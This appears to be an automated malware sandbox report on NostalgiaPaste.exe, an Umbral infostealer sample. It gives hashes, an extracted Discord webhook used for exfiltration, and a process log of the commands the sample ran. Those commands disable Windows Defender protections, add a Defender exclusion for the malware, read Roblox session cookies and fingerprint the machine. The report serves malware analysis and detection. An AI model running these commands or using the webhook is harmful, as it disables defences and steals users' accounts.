Analysis
-
max time kernel
150s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
11-01-2024 14:11
Static task
static1
Behavioral task
behavioral1
Sample
NostalgiaPaste.rar
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
NostalgiaPaste.rar
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
InjectionLibrary.dll
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
InjectionLibrary.dll
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
NostalgiaPaste.exe
Resource
win7-20231129-en
General
-
Target
NostalgiaPaste.exe
-
Size
614KB
-
MD5
863ccaa8f5615fd603e3df9e08d433c6
-
SHA1
58e5ac27b4c8ce04b705fbd4fc267c7c96ae8438
-
SHA256
b502a581b8b5f291508791631fbd40853edc952572eaa214086f6a91694a284a
-
SHA512
715dccca665ffc88da761fc2ae0a9a01a477c3546b86fc0922ca033b4826f44b42c2c718b1adec2c26e9736e3e81c144ef5f5161706daa3acbabe8b0f952a906
-
SSDEEP
12288:3l/5a8Yv+Gk+IRvmf8lDATKwRP7NaaWSxpumTFzoLIOnrDjfBlfrkfVNaw9mmrz6:3P9rGbIRuf8lkRP7NaLGNoLbjfBl4NN7
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1181984415631556658/BCw2PGM7G2P1INjg20jIb3iks900bskPUiI8iXan-y9H-QjeQliGxPeRcMF8V8-SmGiy
Signatures
-
Detect Umbral payload 3 IoCs
resource yara_rule behavioral5/files/0x000900000001410b-9.dat family_umbral behavioral5/memory/2272-13-0x0000000000A50000-0x0000000000A90000-memory.dmp family_umbral behavioral5/memory/2156-6-0x0000000001F90000-0x0000000001FCE000-memory.dmp family_umbral -
Executes dropped EXE 1 IoCs
pid Process 2272 nostalgia_authentication.exe -
Loads dropped DLL 1 IoCs
pid Process 2156 NostalgiaPaste.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2224 wmic.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C nostalgia_authentication.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 nostalgia_authentication.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 nostalgia_authentication.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e210f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 nostalgia_authentication.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe 2156 NostalgiaPaste.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2156 NostalgiaPaste.exe Token: SeDebugPrivilege 2272 nostalgia_authentication.exe Token: SeDebugPrivilege 2568 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2248 powershell.exe Token: SeIncreaseQuotaPrivilege 2424 wmic.exe Token: SeSecurityPrivilege 2424 wmic.exe Token: SeTakeOwnershipPrivilege 2424 wmic.exe Token: SeLoadDriverPrivilege 2424 wmic.exe Token: SeSystemProfilePrivilege 2424 wmic.exe Token: SeSystemtimePrivilege 2424 wmic.exe Token: SeProfSingleProcessPrivilege 2424 wmic.exe Token: SeIncBasePriorityPrivilege 2424 wmic.exe Token: SeCreatePagefilePrivilege 2424 wmic.exe Token: SeBackupPrivilege 2424 wmic.exe Token: SeRestorePrivilege 2424 wmic.exe Token: SeShutdownPrivilege 2424 wmic.exe Token: SeDebugPrivilege 2424 wmic.exe Token: SeSystemEnvironmentPrivilege 2424 wmic.exe Token: SeRemoteShutdownPrivilege 2424 wmic.exe Token: SeUndockPrivilege 2424 wmic.exe Token: SeManageVolumePrivilege 2424 wmic.exe Token: 33 2424 wmic.exe Token: 34 2424 wmic.exe Token: 35 2424 wmic.exe Token: SeIncreaseQuotaPrivilege 2424 wmic.exe Token: SeSecurityPrivilege 2424 wmic.exe Token: SeTakeOwnershipPrivilege 2424 wmic.exe Token: SeLoadDriverPrivilege 2424 wmic.exe Token: SeSystemProfilePrivilege 2424 wmic.exe Token: SeSystemtimePrivilege 2424 wmic.exe Token: SeProfSingleProcessPrivilege 2424 wmic.exe Token: SeIncBasePriorityPrivilege 2424 wmic.exe Token: SeCreatePagefilePrivilege 2424 wmic.exe Token: SeBackupPrivilege 2424 wmic.exe Token: SeRestorePrivilege 2424 wmic.exe Token: SeShutdownPrivilege 2424 wmic.exe Token: SeDebugPrivilege 2424 wmic.exe Token: SeSystemEnvironmentPrivilege 2424 wmic.exe Token: SeRemoteShutdownPrivilege 2424 wmic.exe Token: SeUndockPrivilege 2424 wmic.exe Token: SeManageVolumePrivilege 2424 wmic.exe Token: 33 2424 wmic.exe Token: 34 2424 wmic.exe Token: 35 2424 wmic.exe Token: SeIncreaseQuotaPrivilege 280 wmic.exe Token: SeSecurityPrivilege 280 wmic.exe Token: SeTakeOwnershipPrivilege 280 wmic.exe Token: SeLoadDriverPrivilege 280 wmic.exe Token: SeSystemProfilePrivilege 280 wmic.exe Token: SeSystemtimePrivilege 280 wmic.exe Token: SeProfSingleProcessPrivilege 280 wmic.exe Token: SeIncBasePriorityPrivilege 280 wmic.exe Token: SeCreatePagefilePrivilege 280 wmic.exe Token: SeBackupPrivilege 280 wmic.exe Token: SeRestorePrivilege 280 wmic.exe Token: SeShutdownPrivilege 280 wmic.exe Token: SeDebugPrivilege 280 wmic.exe Token: SeSystemEnvironmentPrivilege 280 wmic.exe Token: SeRemoteShutdownPrivilege 280 wmic.exe Token: SeUndockPrivilege 280 wmic.exe Token: SeManageVolumePrivilege 280 wmic.exe Token: 33 280 wmic.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2156 wrote to memory of 2272 2156 NostalgiaPaste.exe 28 PID 2156 wrote to memory of 2272 2156 NostalgiaPaste.exe 28 PID 2156 wrote to memory of 2272 2156 NostalgiaPaste.exe 28 PID 2156 wrote to memory of 2272 2156 NostalgiaPaste.exe 28 PID 2272 wrote to memory of 2568 2272 nostalgia_authentication.exe 31 PID 2272 wrote to memory of 2568 2272 nostalgia_authentication.exe 31 PID 2272 wrote to memory of 2568 2272 nostalgia_authentication.exe 31 PID 2272 wrote to memory of 1928 2272 nostalgia_authentication.exe 38 PID 2272 wrote to memory of 1928 2272 nostalgia_authentication.exe 38 PID 2272 wrote to memory of 1928 2272 nostalgia_authentication.exe 38 PID 2272 wrote to memory of 2308 2272 nostalgia_authentication.exe 33 PID 2272 wrote to memory of 2308 2272 nostalgia_authentication.exe 33 PID 2272 wrote to memory of 2308 2272 nostalgia_authentication.exe 33 PID 2272 wrote to memory of 2248 2272 nostalgia_authentication.exe 36 PID 2272 wrote to memory of 2248 2272 nostalgia_authentication.exe 36 PID 2272 wrote to memory of 2248 2272 nostalgia_authentication.exe 36 PID 2272 wrote to memory of 2424 2272 nostalgia_authentication.exe 49 PID 2272 wrote to memory of 2424 2272 nostalgia_authentication.exe 49 PID 2272 wrote to memory of 2424 2272 nostalgia_authentication.exe 49 PID 2272 wrote to memory of 280 2272 nostalgia_authentication.exe 48 PID 2272 wrote to memory of 280 2272 nostalgia_authentication.exe 48 PID 2272 wrote to memory of 280 2272 nostalgia_authentication.exe 48 PID 2272 wrote to memory of 2220 2272 nostalgia_authentication.exe 47 PID 2272 wrote to memory of 2220 2272 nostalgia_authentication.exe 47 PID 2272 wrote to memory of 2220 2272 nostalgia_authentication.exe 47 PID 2272 wrote to memory of 2412 2272 nostalgia_authentication.exe 46 PID 2272 wrote to memory of 2412 2272 nostalgia_authentication.exe 46 PID 2272 wrote to memory of 2412 2272 nostalgia_authentication.exe 46 PID 2272 wrote to memory of 2224 2272 nostalgia_authentication.exe 44 PID 2272 wrote to memory of 2224 2272 nostalgia_authentication.exe 44 PID 2272 wrote to memory of 2224 2272 nostalgia_authentication.exe 44
Processes
-
C:\Users\Admin\AppData\Local\Temp\NostalgiaPaste.exe"C:\Users\Admin\AppData\Local\Temp\NostalgiaPaste.exe"1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2156 -
C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe"C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe"2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2272 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe'3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2308
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2224
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵PID:2412
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:2220
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2424
-
-